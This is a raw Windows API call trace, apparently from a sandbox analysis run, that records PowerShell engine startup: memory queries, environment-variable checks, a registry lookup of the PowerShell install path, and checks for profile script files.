[0081.281] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.282] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.282] CoTaskMemFree (pv=0x256340)
[0081.316] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.318] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.318] CoTaskMemFree (pv=0x256340)
[0081.318] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.318] CoTaskMemFree (pv=0x256340)
[0081.319] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.319] CoTaskMemFree (pv=0x256340)
[0081.319] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.319] CoTaskMemFree (pv=0x256340)
[0081.320] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.320] CoTaskMemFree (pv=0x256340)
[0081.320] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.320] CoTaskMemFree (pv=0x256340)
[0081.341] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.341] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.460] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0081.504] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0081.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.504] CoTaskMemFree (pv=0x256340)
[0081.751] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x256780
[0081.759] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x256890
[0081.964] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.053] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.056] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.057] VirtualQuery (in: lpAddress=0x16a1a0, lpBuffer=0x16b060, dwLength=0x30 | out: lpBuffer=0x16b060*(BaseAddress=0x16a000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.136] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.137] VirtualQuery (in: lpAddress=0x16b750, lpBuffer=0x16c610, dwLength=0x30 | out: lpBuffer=0x16c610*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.138] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.138] CoTaskMemFree (pv=0x2569a0)
[0082.167] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.167] CoTaskMemFree (pv=0x2569a0)
[0082.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.183] VirtualQuery (in: lpAddress=0x16ba00, lpBuffer=0x16c8c0, dwLength=0x30 | out: lpBuffer=0x16c8c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0082.184] VirtualQuery (in: lpAddress=0x16ba00, lpBuffer=0x16c8c0, dwLength=0x30 | out: lpBuffer=0x16c8c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.184] VirtualQuery (in: lpAddress=0x16b250, lpBuffer=0x16c110, dwLength=0x30 | out: lpBuffer=0x16c110*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.184] VirtualQuery (in: lpAddress=0x16b250, lpBuffer=0x16c110, dwLength=0x30 | out: lpBuffer=0x16c110*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.184] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d858 | out: phkResult=0x16d858*=0x3a8) returned 0x0
[0082.184] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d7dc, lpData=0x0, lpcbData=0x16d7d8*=0x0 | out: lpType=0x16d7dc*=0x1, lpData=0x0, lpcbData=0x16d7d8*=0x56) returned 0x0
[0082.184] CoTaskMemAlloc (cb=0x5a) returned 0x2f8eb0
[0082.185] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d7ac, lpData=0x2f8eb0, lpcbData=0x16d7a8*=0x56 | out: lpType=0x16d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d7a8*=0x56) returned 0x0
[0082.185] CoTaskMemFree (pv=0x2f8eb0)
[0082.185] RegCloseKey (hKey=0x3a8) returned 0x0
[0082.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d858 | out: phkResult=0x16d858*=0x3a8) returned 0x0
[0082.185] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d7dc, lpData=0x0, lpcbData=0x16d7d8*=0x0 | out: lpType=0x16d7dc*=0x1, lpData=0x0, lpcbData=0x16d7d8*=0x56) returned 0x0
[0082.185] CoTaskMemAlloc (cb=0x5a) returned 0x2f8eb0
[0082.185] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d7ac, lpData=0x2f8eb0, lpcbData=0x16d7a8*=0x56 | out: lpType=0x16d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d7a8*=0x56) returned 0x0
[0082.185] CoTaskMemFree (pv=0x2f8eb0)
[0082.185] RegCloseKey (hKey=0x3a8) returned 0x0
[0082.185] CoTaskMemAlloc (cb=0x20c) returned 0x31b6e0
[0082.185] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31b6e0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0082.185] CoTaskMemFree (pv=0x31b6e0)
[0082.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0082.185] CoTaskMemAlloc (cb=0x20c) returned 0x31b6e0
[0082.185] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31b6e0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0082.185] CoTaskMemFree (pv=0x31b6e0)
[0082.185] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0082.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
[0082.186] SetErrorMode (uMode=0x1) returned 0x1
[0082.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.186] SetErrorMode (uMode=0x1) returned 0x1
[0082.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
[0082.186] SetErrorMode (uMode=0x1) returned 0x1
[0082.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.186] SetErrorMode (uMode=0x1) returned 0x1
[0082.186] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39
[0082.186] SetErrorMode (uMode=0x1) returned 0x1
[0082.186] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.186] SetErrorMode (uMode=0x1) returned 0x1
[0082.186] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e
[0082.187] SetErrorMode (uMode=0x1) returned 0x1
[0082.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d7c0 | out: lpFileInformation=0x16d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0082.187] SetErrorMode (uMode=0x1) returned 0x1
[0082.187] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.187] CoTaskMemFree (pv=0x2569a0)
[0082.187] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.187] CoTaskMemFree (pv=0x2569a0)
[0082.188] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
